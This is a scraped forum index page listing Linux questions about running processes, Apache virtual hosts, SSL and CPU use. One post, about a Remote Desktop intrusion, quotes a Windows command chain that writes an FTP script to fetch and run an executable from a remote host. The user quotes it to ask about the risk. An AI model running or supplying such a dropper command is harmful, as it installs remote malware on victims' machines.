Ubuntu Security :: Multiple Unwanted Apache2 Processes Running?
Mar 3, 2011
my computer is often very slow, to the point of stalling. I tty'd in and when I ran ps -ef I noticed about 10 /usr/sbin/apache2 -k start I dont even want 1 apache running. Any suggestions why these are running, or how to stop it? Well, I can stop it with a sudo killall, but how can I make sure it doesnt happen again?
View 5 Replies
ADVERTISEMENT
May 7, 2011
To: The Cog >>>
Code:
The Cog, heres the reszults for ps -ef | grep tty:
yo mama@blah:~$ ps -ef | grep tty
[code]....
View 9 Replies
View Related
Dec 30, 2010
I've a Linux box with few users (with shell). I would like to prevent normal users see all the processes running on the box. How can I implement this?
View 1 Replies
View Related
Jun 26, 2010
I have been experimenting with KDEs Remote Desktop connection facility and now every time I start the computer a dialog box opens called 'Invitation - Desktop Sharing'. How do I stop this program running on start-up?
View 1 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
Sep 11, 2010
A portscan reveals that port 39878 is 'open', service: 'unknown. I deny service for this port in Firestarter FW 'policy' Firestarter does not show any active connection. I am not running any apps, so how can I close this port?
View 9 Replies
View Related
Jan 10, 2010
With hardy, I was able to have multiple SSL sites on the one machine. But I can't seem to get it to work for ubuntu 9.10, I've read that you need to put each SSL site on a different IP. But I was able to do it with hardy without different IP's.
View 4 Replies
View Related
Jul 27, 2010
This is the second new install of 10.4 on the same machine with the same issue. After boot, as soon as user logs into the desktop, sys mon shows cpu at 100 percent and a steady climb in ram usage. several processes are spawned continuously until all ram is consumed and then moves on to use scratch space.
Using top, the process count moves into over a thousand total processes. Some investigation using top, ps, and digging into the /proc folder shows a ppid of 1 If the machine is booted to shell, top shows 120 processes and is stable. Some of the processes running repetitively are the gnome toolbar, nautilus, and I wish I was clear headed enough to write the others down before I left work. I can certainly get a more complete list in the morning.
I have swapped out ram, and the processor with no success. I have also tried apt-get purge ubuntu-desktop then installing with apt, this did not resolve it. As mentioned at the top of the post, this is the second install with these symptoms. The first install started showing the issue about 10 hours after first boot. On this second install, all was working fine for a couple days before this started in.
View 9 Replies
View Related
Jun 13, 2011
I have running license server on my server. Right now I would like to write small status script and check if software is running.My software include 3 deamons:
1) daemonA
2) daemonB
3) daemonC
My script should check, if each of this deamon is running. If all deamons are running then script should print short output: "License server is running" if one of this daemons is not running, output should "License server is not running". Is it possible to write small loop to check it ? Let say, loop will take new daemon name from deamons pool and will check if its running. Sometimes I need to check more than three daemons of one Program and I dont know how to write good script for this. Maybe somebody could help me with this loop that in the future I could also use; daemonD, daemonE, daemonF.etc.etc. if all daemons from pool is running then..."Software is running"
View 3 Replies
View Related
Dec 15, 2010
I am trying add three namebased virtual hosts in local apache2 webserver OS ubuntu 10.10. The three sites are :www.site1.eka,www.site2.eka,www.site2.eka
The first I created a file is virtual.conf in conf.d directory its content is :
# we're running multiple virtual hosts.
# NameVirtualHost *:80
Next I created following files in sites-available directory. [URL] is as follows:
#site1.eka (/etc/apache2/sites-available/www.site1.eka)
<VirtualHost *:80>
ServerAdmin webmaster@site1.eka
ServerName www.site1.eka
ServerAlias site1.eka .....
When I visit the [URL] in browser it says server not found.
View 3 Replies
View Related
Oct 23, 2010
As an assignment i was doing a program to create two process using fork and pass messages between them using message queue.Did it worked well until my friend tried to copy it using scp.suddenly all hell broke loose as processes without ran syncronisation ie. in tech terms the process just wont wait wen a message queue is empty.it keeps on executing randomly.but after a reboot .. everything worked fine. until again i tried to do scp on my system on purpose. and again the program just went mad.
View 3 Replies
View Related
Sep 2, 2010
when I start my application it creates a message queue and forks a process. The child process reads multicast packets from the network and writes to message queue. The parent process reads packets from message queue and compares source ip and sequence number (it is part of payload) with last 64K packets received to see if it has received a duplicate packet. I am using message queue as a buffer because I do not want child process to drop any packets while it is comparing it with previously received packets. The message queue is large enough to contain 64K packets. To compare the old packets I am using array of structures as circular buffer. During a spike I may receive 100 - 120 packets per milli second.
When I run my application, the parent process keeps up with the child process, I can see that with "ipcs -q". After about 30 seconds it cannot keep up and the size of message queue keeps increasing until it is full. When I run "top" I can see that one CPU/core is hundred percent busy while other 7 cores are idle. It seems that both processes are running on same core and the child process gets interrupts everytime there is a packet on the net and starves the parent process.I am running RHEL 5. The system has 24GB memory and my application is the only application running on it. It is a HP G6 server.
View 3 Replies
View Related
Sep 3, 2010
I'm looking for a way in Perl to be able to take a list of servers, ssh multiple commands to it and store the results. If I do this process serially, sometimes one server will hang the whole script and if it doesn't, it still takes hours to complete.
I'm thinking what I need to do is make a parent loop that calls out a separate process that passes the server name to the child sub process and then executes all the commands I have defined in its own process. If one server 'hangs', at least that won't stop the script from doing all the other servers in the list.
I'm guessing using the fork() command would serve me best, however, all the online descriptions I have found have been vague at best.
View 4 Replies
View Related
May 15, 2010
Whenever I monitor my CPU's, it seems only the first is ever utilized, with the second always being at 0%.Does this mean it is not being used, or just not being reported as in use?Is there anything I could do to improve the situation if it is not being used as much as it could be?On Windows, I can assign processes to both cores, or either one. Is there a way to do something similar in Linux?
View 10 Replies
View Related
Mar 28, 2010
My server is really slow. When I did a top -c or ps aux, below shows up. Shouldn't there be only one? Shall I kill all those processes and leave only one?
3135 nobody 15 0 15900 5232 1860 S 0.0 0.1 0:00.17 /usr/local/apache/bin/httpd -k restart -DSSL
3173 nobody 16 0 15900 5244 1848 S 0.0 0.1 0:00.05 /usr/local/apache/bin/httpd -k restart -DSSL
3174 nobody 15 0 15900 5232 1860 S 0.0 0.1 0:00.15 /usr/local/apache/bin/httpd -k restart -DSSL
5153 nobody 15 0 15900 5228 1860 S 0.0 0.1 0:00.04 /usr/local/apache/bin/httpd -k restart -DSSL
7598 nobody 16 0 15900 5228 1872 S 0.0 0.1 0:00.20 /usr/local/apache/bin/httpd -k restart -DSSL .....
View 5 Replies
View Related
May 18, 2010
I would like to do the following: Create a banner for any user logging in through ssh which warns him/her about the number of processors being used already by other users (or conversely the number of free processors). For example, if a user logged in he would then see a message like: Warning! 7 out of 8 processors are in use.I already figured out how to do a banner and with ps -e -o pcpu I can get all processes' %CPU usage. I think I would like to count the number of processes which have more than 90% CPU usage and output this number ("7" in the example) in the banner
View 7 Replies
View Related
Feb 8, 2011
Ubuntu 10.10. I am curious if there is kind of task manager in ubuntu I can see running processes etc? Like windows task manager?
View 5 Replies
View Related
Mar 15, 2011
When I ps -e, I see a whole bunch of processes, many more that when I ran Slackware.Is there a list of processess I can look at to see what they are and what ones I dont need, instead of googling each one and getting some cryptic explanation?
View 2 Replies
View Related
Jun 6, 2010
GNU/linux kernel 2.6, Slackware 12.0.Hi:How do I know what processes are running?
View 6 Replies
View Related
Aug 16, 2011
How can I allow multiple SSL certificates in the default-ssl file in /etc/apache2/sites-available/ folder? I tried
Code:
NameVirtualHost *:443
And
Code:
<VirtualHost *:443>
but I get the error
[Code]...
View 2 Replies
View Related
Sep 24, 2010
I've got this problem for a few weeks and I cannot figure out. I'm pulling my hair out. I have a server installed PHP, lighttpd and redis. Sometimes, I got the following messages in the error log of lighty: Code: 2010-09-24 13:57:33: (mod_fastcgi.c.3011) backend is overloaded; we'll disable it for 1 seconds and send the request to anoth er backend instead: reconnects: 0 load: 567 2010-09-24 13:57:33: (mod_fastcgi.c.3011) backend is overloaded; we'll disable it for 1 seconds and send the request to anoth
er backend instead: reconnects: 0 load: 626 and:
[Code]..
View 3 Replies
View Related
Jan 9, 2010
is there any possible way to hide currently running processes from an user? This means I do not want him to know about what programs/processes does any other user but him run. In short words if that user runs 'ps -aux' he should get only his processes.
View 3 Replies
View Related
Feb 22, 2010
I'm looking for a command that will give me a list of users (unique, dont name my user account 60 times) that are running processes on a system.
View 5 Replies
View Related
Apr 1, 2010
When I open top and look at the running processes, there a bunch that are -5 in the nice and 0 with everything else.
[Code]....
View 4 Replies
View Related
Jul 17, 2010
Ran the most recent updates several days ago and now System Monitor show my CPU at %100 constantly although it shows no processes running.
View 9 Replies
View Related
Dec 19, 2010
First time Ubuntu user (used to be on debian earlier).
I like that everything works out of the box (had to install codecs etc, but thats standard); but I dont like that there are 260 processes running. Is there a utility to stop unnecessary processes from running in Ubuntu 10.10? I used rcconf but there did not seem to be a whole lot of startup processes that were enabled. Yet somehow I am running 260 processes now.
Even if I log into fluxbox, I get 200+ processes running.
View 9 Replies
View Related
Mar 14, 2010
I have had a LAMP setup on my computer for a while without any trouble but I have suddenly become unable to access it through either localhost or my IP address. I have tried removing and reinstalling the packages but it still doesn't work and the /var/log/apache2/error.log does not give me any errors.
Here is my apache2.conf
[URL]
View 5 Replies
View Related
May 4, 2010
I'm a web developer and I make plug-ins for various shopping cart softwares on demand. because of this I'm constantly installing carts and then immediately updating them/modifying them. The problem I'm having is that I'm having to update the permissions manually all the time (every time I copy a new cart into the /var/www folder). Instead of doing this I'd like apache2 to run under my user, so I don't ever have to update the permissions again. How do I do this?
View 1 Replies
View Related
Nov 3, 2010
I list all the instances of a running process my doing:ps -ef | grep myprogramThis lists all them.how can I simply output a count of how many are running?
View 2 Replies
View Related
May 10, 2010
I have some problem in apache2 configuration. I have two websites on same IP on LAN.i.e. 192.168.1.5
[Code]...
What should I check in a few blogs I checked they said to mention in [URL]...But in this case what should I put I have two different websites or what other thing I have missed? I do not have access to DNS so that on LAN I can point site1.abc.com and abc.com to same IP 192.168.1.5 which to me seems could resolve the issue.
View 6 Replies
View Related